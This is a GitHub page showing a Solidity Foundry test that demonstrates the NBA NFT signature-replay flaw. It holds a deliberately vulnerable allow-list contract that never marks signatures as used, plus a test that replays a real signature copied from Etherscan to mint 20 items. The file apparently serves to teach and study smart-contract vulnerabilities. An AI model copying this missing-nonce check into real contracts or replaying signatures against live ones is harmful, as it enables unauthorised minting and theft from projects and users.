-
Notifications
You must be signed in to change notification settings - Fork 287
/
Copy pathSignatureReplayNBA.sol
122 lines (108 loc) · 3.66 KB
/
SignatureReplayNBA.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;
import "forge-std/Test.sol";
/*
We use NBA NFT incident as an example.
‘Association NFT’ collection by the NBA, which triggers the ‘Allow list’ to sell out permanently.
This vulnerability could’ve allowed any malicious entity to mint several NFTs without paying any tokens.
This contract fails to verify that a signature can be used only once.
*/
interface INBA {
struct vData {
bool mint_free;
uint256 max_mint;
address from;
uint256 start;
uint256 end;
uint256 eth_price;
uint256 dust_price;
bytes signature;
}
function mint_approved(
vData memory info,
uint256 number_of_items_requested,
uint16 _batchNumber
) external;
}
contract ContractTest is Test {
NBA NBAContract;
function testMintNFT() public {
NBAContract = new NBA();
// Copy any successful signature from etherscan.
// https://etherscan.io/tx/0x0555d3d7a9d1d5659cd99c69f15fb88da57307c3970678fb5e6547879bc548a6
INBA.vData memory info = INBA.vData({
mint_free: true,
max_mint: 1,
from: 0x23Bd1adaB0917A2Ed5007aA39e4040487BE2DAd1,
start: 0,
end: 5555555555,
eth_price: 0,
dust_price: 0,
signature: hex"b3589c052ba90e14654d1fac78fb2fd9708355e1a686bed502f65e7ac0a47ad722dcc6c0dcc9445f608162648e000dcc8a845c2ed523202465dc9bdd239484b51b"
});
INBA(address(NBAContract)).mint_approved(info, 20, 0);
}
receive() external payable {}
}
contract NBA is Test {
uint16 public batchNumber;
address signer = 0x669F499e7BA51836BB76F7dD2bc3C1A37a5342D7;
struct vData {
bool mint_free;
uint256 max_mint;
address from;
uint256 start;
uint256 end;
uint256 eth_price;
uint256 dust_price;
bytes signature;
}
function mint_approved(
vData memory info,
uint256 number_of_items_requested,
uint16 _batchNumber
) external view {
require(batchNumber == _batchNumber, "!batch");
// address from = msg.sender;
require(verify(info), "Unauthorised access secret"); // check whitelist
console.log(
"Verified, you are in whitelist! You can mint:",
number_of_items_requested
);
//_mintCards(number_of_items_requested, from);
}
function verify(vData memory info) public view returns (bool) {
require(info.from != address(0), "INVALID_SIGNER");
bytes memory cat = abi.encode(
info.from,
info.start,
info.end,
info.eth_price,
info.dust_price,
info.max_mint,
info.mint_free
);
// console.log("data-->");
// console.logBytes(cat);
bytes32 hash = keccak256(cat);
// console.log("hash ->");
// console.logBytes32(hash);
require(info.signature.length == 65, "Invalid signature length");
bytes32 sigR;
bytes32 sigS;
uint8 sigV;
bytes memory signature = info.signature;
// ecrecover takes the signature parameters, and the only way to get them
// currently is to use assembly.
assembly {
sigR := mload(add(signature, 0x20))
sigS := mload(add(signature, 0x40))
sigV := byte(0, mload(add(signature, 0x60)))
}
bytes32 data = keccak256(
abi.encodePacked("\x19Ethereum Signed Message:\n32", hash)
);
address recovered = ecrecover(data, sigV, sigR, sigS);
return signer == recovered;
}
}